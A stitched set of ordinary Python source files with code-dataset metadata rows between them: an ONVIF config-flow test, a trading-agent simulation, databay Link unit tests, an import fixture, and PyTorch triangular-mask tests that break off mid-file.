setup_mock_onvif_camera(mock_onvif_camera)
mock_onvif_camera.create_devicemgmt_service = MagicMock(
side_effect=Fault("Auth Error")
)
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "configure"
assert result["errors"]["base"] == "cannot_connect"
async def test_option_flow(hass):
"""Test config flow options."""
entry, _, _ = await setup_onvif_integration(hass)
result = await hass.config_entries.options.async_init(entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "onvif_devices"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
config_flow.CONF_EXTRA_ARGUMENTS: "",
config_flow.CONF_RTSP_TRANSPORT: config_flow.RTSP_TRANS_PROTOCOLS[1],
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["data"] == {
config_flow.CONF_EXTRA_ARGUMENTS: "",
config_flow.CONF_RTSP_TRANSPORT: config_flow.RTSP_TRANS_PROTOCOLS[1],
}
| 36.255682
| 106
| 0.64457
| 2,231
| 19,143
| 5.200359
| 0.071268
| 0.11205
| 0.104982
| 0.088174
| 0.874591
| 0.86373
| 0.840286
| 0.822013
| 0.818393
| 0.809171
| 0
| 0.002821
| 0.259207
| 19,143
| 527
| 107
| 36.324478
| 0.815316
| 0.0105
| 0
| 0.664319
| 0
| 0
| 0.135626
| 0.087858
| 0
| 0
| 0
| 0
| 0.140845
| 1
| 0.002347
| false
| 0.035211
| 0.042254
| 0
| 0.044601
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d4bbe95ba1a91c39688ec390f96da9b1cf149480
| 7,725
|
py
|
Python
|
agent.py
|
ringochuchudull/abm-fms-intel
|
9a7541b7ae8c826bb8a4660e87ed7085edeab61f
|
[
"Apache-2.0"
] | null | null | null |
agent.py
|
ringochuchudull/abm-fms-intel
|
9a7541b7ae8c826bb8a4660e87ed7085edeab61f
|
[
"Apache-2.0"
] | null | null | null |
agent.py
|
ringochuchudull/abm-fms-intel
|
9a7541b7ae8c826bb8a4660e87ed7085edeab61f
|
[
"Apache-2.0"
] | null | null | null |
from utility import *
import random
import numpy as np #np.exp
# Super Class
class Agent:
'''
An abstract agent class that allows itself to updates its state and react
record(): Change the amount the shares holding and record the new price
act(): Simulation of a trading decision
'''
def __init__(self, id):
self.id = id
self.share = 0 #Also detemine whether he is a buyer or seller
self.sell_record = []
self.buy_record = []
def __str__(self):
return '<Agent ' + str(self.id) + ' > '
def record(self, direction, trans_price, market=None, quantity=1):
if direction: #If Sell
self.share -= quantity
self.sell_record.append(trans_price)
else:
self.share += quantity
self.buy_record.append(trans_price)
def newact(self):
# Implementated in subclass accordingly to types of agents
# This method should return 'dealer(Agent Object)', 'transaction_price(int)' 'direction(BUY/SELL)'
raise Exception('No implementation')
def profit(self):
return sum(self.sell_record) - sum(self.buy_record)
# Sub Class
class ZeroIntelligentAgent(Agent):
def __init__(self, id, sellprice=maxP, bidprice=1):
Agent.__init__(self,id)
self.sellprice = sellprice
self.bidprice = bidprice
def __str__(self):
return '<0IQAgent %d owns %d share with sell price %f and bidprice %f>' % (self.id, self.share, self.sellprice, self.bidprice)
def resetPrice(self,price):
self.bidprice = random.randint(1,price)
self.sellprice = random.randint(price, maxP)
def sell(self, market=None):
if updateSellorBidPrice():
self.sellprice -= 1
if not market.num_buyer:
#market.record_order(market.stockprice)
return None, None
else:
index = -1
maxBuy = 1
for i,s in enumerate(market.agentlist):
if s.bidprice > maxBuy and not s.share:
index, maxBuy = i, s.bidprice
curr_buyer_agent = market.agentlist[index]
tranction_price = maxBuy
return curr_buyer_agent, tranction_price
def buy(self, market=None):
# a) Update the price
if updateSellorBidPrice():
self.bidprice += 1
if not market.num_seller:
print('haha')
return None, market.stockprice
else:
index = -1
minSell = maxP
for i,s in enumerate(market.agentlist):
if s.sellprice < minSell and s.share:
index, minSell = i, s.sellprice
print('Agent ' + str(index+1) + ' offers to sell the lowest price £' + str(minSell))
# Buy at market
if market.stockprice < minSell and market.shares > 0:
return None, market.stockprice
else:
# Buy from Sellers
curr_seller_agent = market.agentlist[index]
tranction_price = minSell
return curr_seller_agent, tranction_price
def record(self, direction, price, market=None, quantity=1, reset=True):
if direction: #If Sell
self.share -= quantity
self.sell_record.append(price)
else:
self.share += quantity
self.buy_record.append(price)
if reset:
print('reset price')
self.resetPrice(int(price))
def newact(self, market):
# If the agent has one share, the agent is a seller
if self.share:
direction = SELL
current_buyer, transaction_price = self.sell(market=market)
#if current_buyer is not None:
# self.record(SELL, transaction_price)
return current_buyer, transaction_price, direction
else:
direction = BUY
current_seller, transaction_price = self.buy(market=market)
#self.record(BUY, transaction_price)
return current_seller, transaction_price, direction
# Sub Class
class ImitatingAgent(Agent):
def __init__(self, id, sellprice=maxP, bidprice=1):
Agent.__init__(self,id)
self.sellprice = sellprice
self.bidprice = bidprice
def __str__(self):
return '<ImitatingAgent %d owns %d share with sell price %f and bidprice %f>' % (self.id, self.share, self.sellprice, self.bidprice)
def resetPrice(self, market=None):
if self.share > 0:
# Case as of a Potential Seller
temp = []
temp = [a for a in market.agentlist if a.share]
random.shuffle(temp)
tempAgent = temp[0]
self.sellprice = tempAgent.sellprice
elif not self.share:
# Case as of a potential buyer
temp = []
temp = [a for a in market.agentlist if not a.share]
random.shuffle(temp)
tempAgent = temp[0]
self.bidprice = tempAgent.bidprice
def sell(self, market=None):
if updateSellorBidPrice():
self.sellprice -= 1
if not market.num_buyer:
#market.record_order(market.stockprice)
return None, None
else:
index = -1
maxBuy = 1
for i,s in enumerate(market.agentlist):
if s.bidprice > maxBuy and not s.share:
index, maxBuy = i, s.bidprice
curr_buyer_agent = market.agentlist[index]
tranction_price = maxBuy
return curr_buyer_agent, tranction_price
def buy(self, market=None):
# a) Update the price
if updateSellorBidPrice():
self.bidprice += 1
if not market.num_seller:
print('haha')
return None, market.stockprice
else:
index = -1
minSell = maxP
for i,s in enumerate(market.agentlist):
if s.sellprice < minSell and s.share:
index, minSell = i, s.sellprice
print('Agent ' + str(index+1) + ' offers to sell the lowest price £' + str(minSell))
# Buy at market
if market.stockprice < minSell and market.shares > 0:
return None, market.stockprice
else:
# Buy from Sellers
curr_seller_agent = market.agentlist[index]
tranction_price = minSell
return curr_seller_agent, tranction_price
def record(self, direction, price, market=None, quantity=1, reset=True):
if direction: #If Sell
self.share -= quantity
self.sell_record.append(price)
else:
self.share += quantity
self.buy_record.append(price)
if reset:
print('reset price')
print(market)
self.resetPrice(market=market)
def newact(self, market):
# If the agent has one share, the agent is a seller
if self.share:
direction = SELL
current_buyer, transaction_price = self.sell(market=market)
#if current_buyer is not None:
# self.record(SELL, transaction_price, market)
return current_buyer, transaction_price, direction
else:
direction = BUY
current_seller, transaction_price = self.buy(market=market)
#self.record(BUY, transaction_price, market)
return current_seller, transaction_price, direction
# Test
if __name__ == '__main__':
pass
| 32.1875
| 140
| 0.571909
| 875
| 7,725
| 4.930286
| 0.153143
| 0.027121
| 0.023644
| 0.029207
| 0.7828
| 0.76611
| 0.745712
| 0.745712
| 0.745712
| 0.701437
| 0
| 0.004947
| 0.345761
| 7,725
| 240
| 141
| 32.1875
| 0.848239
| 0.130874
| 0
| 0.773585
| 0
| 0
| 0.041279
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.119497
| false
| 0.006289
| 0.018868
| 0.025157
| 0.27044
| 0.044025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
be08e2af1448fd294e7ea8f8a1b7044cfc0c3737
| 17,651
|
py
|
Python
|
test/test/unit/test_link.py
|
00mjk/databay
|
b11a43b02bed001d0aef89f796b63dfba2da7363
|
[
"Apache-2.0"
] | 1
|
2021-04-02T16:34:57.000Z
|
2021-04-02T16:34:57.000Z
|
test/test/unit/test_link.py
|
00mjk/databay
|
b11a43b02bed001d0aef89f796b63dfba2da7363
|
[
"Apache-2.0"
] | null | null | null |
test/test/unit/test_link.py
|
00mjk/databay
|
b11a43b02bed001d0aef89f796b63dfba2da7363
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import logging
from asyncio import Future
from datetime import timedelta
from unittest import TestCase, mock
from unittest.mock import MagicMock, patch
import databay
from databay import Inlet, Outlet
from databay.errors import InvalidNodeError
from databay.link import Link
from test_utils import DummyException, fqname
# monkey patch the MagicMock's await
async def async_magic():
pass
MagicMock.__await__ = lambda x: async_magic().__await__()
def pull_mock(rv=None):
if rv is None:
rv = [object()]
async def pull_coro(_):
return rv
return MagicMock(side_effect=pull_coro)
class DummyIterable():
def __iter__(self):
raise DummyException()
class TestLink(TestCase):
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_transfer(self, inlet, outlet):
link = Link([inlet], [outlet], timedelta(
seconds=1), tags='test_update')
link.transfer()
inlet._pull.assert_called()
outlet._push.assert_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_run(self, inlet, outlet):
async def task():
link = Link([inlet], [outlet], timedelta(seconds=1),
tags='test_run', copy_records=False)
inlet_result = await inlet._pull(None)
await link._run()
inlet._pull.assert_called()
outlet._push.assert_called_with(inlet_result, mock.ANY)
asyncio.run(task())
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_exception_inlet(self, inlet, outlet):
inlet._pull.side_effect = DummyException('Test exception')
link = Link([inlet], [outlet], timedelta(seconds=1),
ignore_exceptions=False, tags='test_exception_inlet')
self.assertRaises(DummyException, link.transfer)
inlet._pull.assert_called()
outlet._push.assert_not_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_exception_outlet(self, inlet, outlet):
# inlet._pull.return_value, _ = self.inlet_return()
# inlet._pull.side_effect = pull_mock
# inlet._pull.return_value = Future()
outlet._push.side_effect = DummyException('Test exception')
link = Link([inlet], [outlet], timedelta(seconds=1),
ignore_exceptions=False, tags='test_exception_outlet')
link = Link([inlet], [outlet], timedelta(seconds=1),
ignore_exceptions=False, tags='test_exception_outlet')
self.assertRaises(DummyException, link.transfer)
inlet._pull.assert_called()
outlet._push.assert_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_exception_caught(self, inlet, outlet):
logging.getLogger('databay.Link').setLevel(logging.CRITICAL)
inlet._pull.side_effect = DummyException('Test inlet exception')
outlet._push.side_effect = DummyException('Test outlet exception')
link = Link([inlet], [outlet], timedelta(seconds=1),
tags='test_exception_caught', ignore_exceptions=True)
try:
link.transfer()
except Exception as e:
self.fail(f'Should not raise exception: {e}')
inlet._pull.assert_called()
outlet._push.assert_called()
# check that one exception doesn't halt other inlets or outlets
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_ignore_partial_exception(self, inlet1, inlet2, outlet1, outlet2):
logging.getLogger('databay.Link').setLevel(logging.CRITICAL)
async def task():
# inlet_future = Future()
inlet1._pull.side_effect = DummyException('Test inlet1 exception')
outlet1._push.side_effect = DummyException(
'Test outlet1 exception')
# inlet1._pull.return_value = inlet_future
# inlet2._pull.return_value = inlet_future
link = Link([inlet1, inlet2], [outlet1, outlet2], timedelta(
seconds=1), tags='test_ignore_partial_exception', copy_records=False, ignore_exceptions=True)
# results = [object()]
results = await inlet2._pull(None)
# inlet_future.set_result(results)
await link._run()
inlet1._pull.assert_called()
inlet2._pull.assert_called()
outlet1._push.assert_called_with(results, mock.ANY)
outlet2._push.assert_called_with(results, mock.ANY)
asyncio.run(task())
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_on_start(self, inlet1, outlet1):
type(inlet1).active = mock.PropertyMock(return_value=False)
type(outlet1).active = mock.PropertyMock(return_value=False)
link = Link([inlet1], [outlet1], timedelta(
seconds=1), tags='test_on_start')
link.on_start()
inlet1.try_start.assert_called()
outlet1.try_start.assert_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_on_start_already_active(self, inlet1, outlet1):
type(inlet1).active = mock.PropertyMock(return_value=True)
type(outlet1).active = mock.PropertyMock(return_value=True)
link = Link([inlet1], [outlet1], timedelta(seconds=1),
tags='test_on_start_already_active')
link.on_start()
inlet1.on_start.assert_not_called()
outlet1.on_start.assert_not_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_on_shutdown(self, inlet1, outlet1):
type(inlet1).active = mock.PropertyMock(return_value=True)
type(outlet1).active = mock.PropertyMock(return_value=True)
link = Link([inlet1], [outlet1], timedelta(
seconds=1), tags='test_on_shutdown')
link.on_shutdown()
inlet1.try_shutdown.assert_called()
outlet1.try_shutdown.assert_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet)
def test_on_shutdown_already_inactive(self, inlet1, outlet1):
type(inlet1).active = mock.PropertyMock(return_value=False)
type(outlet1).active = mock.PropertyMock(return_value=False)
link = Link([inlet1], [outlet1], timedelta(seconds=1),
tags='test_on_shutdown_already_inactive')
link.on_shutdown()
inlet1.on_shutdown.assert_not_called()
outlet1.on_shutdown.assert_not_called()
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_add_inlet(self, inlet1):
link = Link([], [], timedelta(seconds=1), tags='test_add_inlet')
link.add_inlets(inlet1)
self.assertEqual(link.inlets, [inlet1])
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_add_inlet_multiple(self, inlet1, inlet2):
link = Link([], [], timedelta(seconds=1),
tags='test_add_inlet_multiple')
link.add_inlets([inlet1, inlet2])
self.assertEqual(link.inlets, [inlet1, inlet2])
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_add_inlet_same(self, inlet1):
link = Link([], [], timedelta(seconds=1), tags='test_add_inlet_same')
link.add_inlets(inlet1)
self.assertRaises(InvalidNodeError, link.add_inlets, inlet1)
self.assertEqual(link.inlets, [inlet1])
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_remove_inlet(self, inlet1, inlet2):
link = Link([], [], timedelta(seconds=1), tags='test_remove_inlet')
link.add_inlets([inlet1, inlet2])
link.remove_inlets(inlet2)
self.assertEqual(link.inlets, [inlet1])
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
def test_remove_inlet_invalid(self, inlet1, inlet2):
link = Link([], [], timedelta(seconds=1),
tags='test_remove_inlet_invalid')
link.add_inlets([inlet1])
self.assertRaises(InvalidNodeError, link.remove_inlets, inlet2)
self.assertEqual(link.inlets, [inlet1])
@patch(fqname(Outlet), spec=Outlet)
def test_add_outlet(self, outlet1):
link = Link([], [], timedelta(seconds=1), tags='test_add_outlet')
link.add_outlets(outlet1)
self.assertEqual(link.outlets, [outlet1])
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Outlet), spec=Outlet)
def test_add_outlet_multiple(self, outlet1, outlet2):
link = Link([], [], timedelta(seconds=1),
tags='test_add_outlet_multiple')
link.add_outlets([outlet1, outlet2])
self.assertEqual(link.outlets, [outlet1, outlet2])
@patch(fqname(Outlet), spec=Outlet)
def test_add_outlet_same(self, outlet1):
link = Link([], [], timedelta(seconds=1), tags='test_add_outlet_same')
link.add_outlets(outlet1)
self.assertRaises(InvalidNodeError, link.add_outlets, outlet1)
self.assertEqual(link.outlets, [outlet1])
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Outlet), spec=Outlet)
def test_remove_outlet(self, outlet1, outlet2):
link = Link([], [], timedelta(seconds=1), tags='test_remove_outlet')
link.add_outlets([outlet1, outlet2])
link.remove_outlets(outlet2)
self.assertEqual(link.outlets, [outlet1])
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Outlet), spec=Outlet)
def test_remove_outlet_invalid(self, outlet1, outlet2):
link = Link([], [], timedelta(seconds=1),
tags='test_remove_outlet_invalid')
link.add_outlets([outlet1])
self.assertRaises(InvalidNodeError, link.remove_outlets, outlet2)
self.assertEqual(link.outlets, [outlet1])
# this rv is invalid, should be a list
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock(object()))
def xtest_non_iterable_raised(self, inlet1):
logging.getLogger('databay.Link').setLevel(logging.ERROR)
link = Link([inlet1], [], timedelta(seconds=1),
tags='test_non_iterable_raised')
with self.assertRaisesRegex(TypeError, 'Inlets must return iterable'):
link.transfer()
# this rv will raise DummyException
@patch(fqname(Inlet), spec=Inlet, _pull=pull_mock(DummyIterable()))
def test_generic_error_raised(self, inlet1):
logging.getLogger('databay.Link').setLevel(logging.ERROR)
link = Link([inlet1], [], timedelta(seconds=1),
tags='test_generic_error_raised')
# with self.assertRaisesRegex(TypeError, databay.link._ITERABLE_EXCEPTION):
self.assertRaises(DummyException, link.transfer)
def test_integer_to_timedelta(self):
link = Link([], [], 1, name='test_integer_interval_coerced')
self.assertEqual(link._interval, timedelta(seconds=1))
def test_float_to_timedelta(self):
link = Link([], [], 1.5, name='test_float_interval_coerced')
self.assertEqual(link._interval, timedelta(seconds=1.5))
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet)
def test_on_start_inlet_exception_raise(self, inlet1, outlet1):
inlet1.try_start.side_effect = lambda: exec('raise(RuntimeError())')
link = Link([inlet1], [outlet1], timedelta(
seconds=1), tags='test_on_start')
self.assertRaises(RuntimeError, link.on_start)
inlet1.try_start.assert_called()
outlet1.try_start.assert_not_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet)
def test_on_start_inlet_exception_catch(self, inlet1, outlet1):
logging.getLogger('databay.Link').setLevel(logging.WARNING)
inlet1.try_start.side_effect = lambda: exec('raise(RuntimeError())')
link = Link([inlet1], [outlet1], timedelta(seconds=1),
tags='test_on_start', ignore_exceptions=True)
with self.assertLogs(logging.getLogger('databay.Link'), level='ERROR') as cm:
link.on_start()
self.assertTrue(
'on_start inlet exception: "" for inlet:' in ';'.join(cm.output))
inlet1.try_start.assert_called()
outlet1.try_start.assert_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet)
def test_on_start_outlet_exception_raise(self, inlet1, outlet1, outlet2):
outlet1.try_start.side_effect = lambda: exec('raise(RuntimeError())')
link = Link([inlet1], [outlet1, outlet2],
timedelta(seconds=1), tags='test_on_start')
self.assertRaises(RuntimeError, link.on_start)
inlet1.try_start.assert_called()
outlet1.try_start.assert_called()
outlet2.try_start.assert_not_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet)
def test_on_start_outlet_exception_catch(self, inlet1, outlet1, outlet2):
logging.getLogger('databay.Link').setLevel(logging.WARNING)
outlet1.try_start.side_effect = lambda: exec('raise(RuntimeError())')
link = Link([inlet1], [outlet1, outlet2], timedelta(
seconds=1), tags='test_on_start', ignore_exceptions=True)
with self.assertLogs(logging.getLogger('databay.Link'), level='ERROR') as cm:
link.on_start()
self.assertTrue(
'on_start outlet exception: "" for outlet:' in ';'.join(cm.output), cm.output)
inlet1.try_start.assert_called()
outlet1.try_start.assert_called()
outlet2.try_start.assert_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet)
def test_on_shutdown_inlet_exception_raise(self, inlet1, outlet1):
inlet1.try_shutdown.side_effect = lambda: exec('raise(RuntimeError())')
link = Link([inlet1], [outlet1], timedelta(
seconds=1), tags='test_on_shutdown')
self.assertRaises(RuntimeError, link.on_shutdown)
inlet1.try_shutdown.assert_called()
outlet1.try_shutdown.assert_not_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet)
def test_on_shutdown_inlet_exception_catch(self, inlet1, outlet1):
logging.getLogger('databay.Link').setLevel(logging.WARNING)
inlet1.try_shutdown.side_effect = lambda: exec('raise(RuntimeError())')
link = Link([inlet1], [outlet1], timedelta(seconds=1),
tags='test_on_shutdown', ignore_exceptions=True)
with self.assertLogs(logging.getLogger('databay.Link'), level='ERROR') as cm:
link.on_shutdown()
self.assertTrue(
'on_shutdown inlet exception: "" for inlet:' in ';'.join(cm.output), cm.output)
inlet1.try_shutdown.assert_called()
outlet1.try_shutdown.assert_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet)
def test_on_shutdown_outlet_exception_raise(self, inlet1, outlet1, outlet2):
outlet1.try_shutdown.side_effect = lambda: exec(
'raise(RuntimeError())')
link = Link([inlet1], [outlet1, outlet2], timedelta(
seconds=1), tags='test_on_shutdown')
self.assertRaises(RuntimeError, link.on_shutdown)
inlet1.try_shutdown.assert_called()
outlet1.try_shutdown.assert_called()
outlet2.try_shutdown.assert_not_called()
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Outlet), spec=Outlet)
@patch(fqname(Inlet), spec=Inlet)
def test_on_shutdown_outlet_exception_catch(self, inlet1, outlet1, outlet2):
logging.getLogger('databay.Link').setLevel(logging.WARNING)
outlet1.try_shutdown.side_effect = lambda: exec(
'raise(RuntimeError())')
link = Link([inlet1], [outlet1, outlet2], timedelta(
seconds=1), tags='test_on_shutdown', ignore_exceptions=True)
with self.assertLogs(logging.getLogger('databay.Link'), level='ERROR') as cm:
link.on_shutdown()
self.assertTrue('on_shutdown outlet exception: "" for outlet:' in ';'.join(
cm.output), cm.output)
inlet1.try_shutdown.assert_called()
outlet1.try_shutdown.assert_called()
outlet2.try_shutdown.assert_called()
def test_single_tag(self):
tag = 'tagA'
link = Link([], [], timedelta(seconds=1), tags=tag)
self.assertEqual(link.tags, [tag])
def test_multiple_tags(self):
tagA = 'tagA'
tagB = 'tagB'
link = Link([], [], timedelta(seconds=1), tags=[tagA, tagB])
self.assertEqual(link.tags, [tagA, tagB])
def test_tag_as_name(self):
link_name = 'link_name'
link = Link([], [], timedelta(seconds=1), name=link_name)
self.assertEqual(link_name, link.tags[0])
def test_name_from_tag(self):
link_name = 'link_name'
link = Link([], [], timedelta(seconds=1), tags=[link_name])
self.assertEqual(link.name, link.tags[0])
| 38.623632
| 109
| 0.659453
| 2,086
| 17,651
| 5.35954
| 0.072867
| 0.059034
| 0.056261
| 0.058229
| 0.833989
| 0.790072
| 0.76288
| 0.748748
| 0.701073
| 0.650089
| 0
| 0.015361
| 0.210753
| 17,651
| 456
| 110
| 38.708333
| 0.787165
| 0.02963
| 0
| 0.559524
| 0
| 0
| 0.078591
| 0.030618
| 0
| 0
| 0
| 0
| 0.232143
| 1
| 0.113095
| false
| 0.002976
| 0.032738
| 0
| 0.157738
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
be10279a3707fb64bc7a51caf1c4e8c2ff7d2db3
| 22
|
py
|
Python
|
test/fixture/python_scanner/nested1/nested2/nested3/imports_parent_module.py
|
Valkatraz/scons
|
5e70c65f633dcecc035751c9f0c6f894088df8a0
|
[
"MIT"
] | 1,403
|
2017-11-23T14:24:01.000Z
|
2022-03-30T20:59:39.000Z
|
test/fixture/python_scanner/nested1/nested2/nested3/imports_parent_module.py
|
Valkatraz/scons
|
5e70c65f633dcecc035751c9f0c6f894088df8a0
|
[
"MIT"
] | 3,708
|
2017-11-27T13:47:12.000Z
|
2022-03-29T17:21:17.000Z
|
test/fixture/python_scanner/nested1/nested2/nested3/imports_parent_module.py
|
Valkatraz/scons
|
5e70c65f633dcecc035751c9f0c6f894088df8a0
|
[
"MIT"
] | 281
|
2017-12-01T23:48:38.000Z
|
2022-03-31T15:25:44.000Z
|
from .. import module
| 11
| 21
| 0.727273
| 3
| 22
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
07ad856f987231b2fd44b496100d308f64913ad4
| 19,625
|
py
|
Python
|
tests/unit/test_general.py
|
windionleaf/windPyTorchUtils
|
252b05fd8a4264349f5a434d88cf25c3a808d51d
|
[
"Unlicense"
] | null | null | null |
tests/unit/test_general.py
|
windionleaf/windPyTorchUtils
|
252b05fd8a4264349f5a434d88cf25c3a808d51d
|
[
"Unlicense"
] | null | null | null |
tests/unit/test_general.py
|
windionleaf/windPyTorchUtils
|
252b05fd8a4264349f5a434d88cf25c3a808d51d
|
[
"Unlicense"
] | null | null | null |
# -*- coding: UTF-8 -*-
""""
Created on 03.11.19
Unit tests for torch utils module.
:author: Martin Dočekal
"""
import unittest
import torch
from windpytorchutils.general import batch_tril_set, batch_triu_set, span_mask, proliferate
class TestTorchUtils(unittest.TestCase):
"""
Unit test class for some of the torch utils.
"""
def setUp(self) -> None:
self.batch = torch.tensor([
[
[1.0, 2.0, 3.0],
[1.0, 2.0, 3.0],
[1.0, 2.0, 3.0]
],
[
[10, 11, 12],
[13, 14, 15],
[16, 17, 18],
]
])
self.batchClone = self.batch.clone()
self.batchRectangleShapeA = torch.tensor([
[
[1.0, 2.0, 3.0],
[1.0, 2.0, 3.0]
],
[
[10, 11, 12],
[13, 14, 15]
]
])
self.batchRectangleShapeAClone = self.batchRectangleShapeA.clone()
self.batchRectangleShapeB = torch.tensor([
[
[1.0, 2.0],
[1.0, 2.0],
[1.0, 2.0]
],
[
[10, 11],
[13, 14],
[16, 17],
]
])
self.batchRectangleShapeBClone = self.batchRectangleShapeB.clone()
self.trilRes = torch.tensor([
[
[0.0, 2.0, 3.0],
[0.0, 0.0, 3.0],
[0.0, 0.0, 0.0]
],
[
[0, 11, 12],
[0, 0, 15],
[0, 0, 0],
]
])
self.trilResRecShapeA = torch.tensor([
[
[0.0, 2.0, 3.0],
[0.0, 0.0, 3.0]
],
[
[0, 11, 12],
[0, 0, 15]
]
])
self.trilResRecShapeB = torch.tensor([
[
[0.0, 2.0],
[0.0, 0.0],
[0.0, 0.0]
],
[
[0, 11],
[0, 0],
[0, 0],
]
])
self.trilWithoutDiagonalRes = torch.tensor([
[
[1.0, 2.0, 3.0],
[0.0, 2.0, 3.0],
[0.0, 0.0, 3.0]
],
[
[10, 11, 12],
[0, 14, 15],
[0, 0, 18],
]
])
self.trilWithoutDiagonalResRecShapeA = torch.tensor([
[
[1.0, 2.0, 3.0],
[0.0, 2.0, 3.0]
],
[
[10, 11, 12],
[0, 14, 15]
]
])
self.trilWithoutDiagonalResRecShapeB = torch.tensor([
[
[1.0, 2.0],
[0.0, 2.0],
[0.0, 0.0]
],
[
[10, 11],
[0, 14],
[0, 0],
]
])
self.triuRes = torch.tensor([
[
[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0],
[1.0, 2.0, 0.0]
],
[
[0, 0, 0],
[13, 0, 0],
[16, 17, 0],
]
])
self.triuResRecShapeA = torch.tensor([
[
[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0]
],
[
[0, 0, 0],
[13, 0, 0]
]
])
self.triuResRecShapeB = torch.tensor([
[
[0.0, 0.0],
[1.0, 0.0],
[1.0, 2.0]
],
[
[0, 0],
[13, 0],
[16, 17],
]
])
self.triuWithoutDiagonalRes = torch.tensor([
[
[1.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[1.0, 2.0, 3.0]
],
[
[10, 0, 0],
[13, 14, 0],
[16, 17, 18],
]
])
self.triuWithoutDiagonalResRecShapeA = torch.tensor([
[
[1.0, 0.0, 0.0],
[1.0, 2.0, 0.0]
],
[
[10, 0, 0],
[13, 14, 0]
]
])
self.triuWithoutDiagonalResRecShapeB = torch.tensor([
[
[1.0, 0.0],
[1.0, 2.0],
[1.0, 2.0]
],
[
[10, 0],
[13, 14],
[16, 17],
]
])
def test_batch_tril_set(self):
"""
